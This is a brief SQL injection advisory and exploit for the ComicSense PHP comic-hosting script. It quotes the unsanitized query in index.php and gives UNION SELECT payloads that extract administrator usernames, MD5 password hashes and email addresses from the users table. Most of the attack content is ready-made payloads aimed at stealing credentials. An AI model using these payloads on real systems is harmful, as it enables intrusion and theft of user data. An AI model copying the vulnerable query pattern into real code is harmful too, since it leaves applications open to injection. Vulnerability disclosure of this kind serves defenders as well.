Comicsense SQL Injection Advisory/Exploit

ID: 72013
CVE: None
Download vulnerable application: None
*  *

by s0cratex
s0cratex (at) hotmail (dot) com [email concealed]

ComicSense is a script using php / mySQL. 
It allows you to easily host an Online Comic
or Image shack.
You can download it from

The bug is a common sql injection in "index.php"

Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
And the variable $epi is not verified...

Admin username UNION SELECT username,1,1 FROM users

MD5 hash password: UNION SELECT password,1,1 FROM users

e-Mail adress: union select email,1,1 from users
1-4-2 (www01)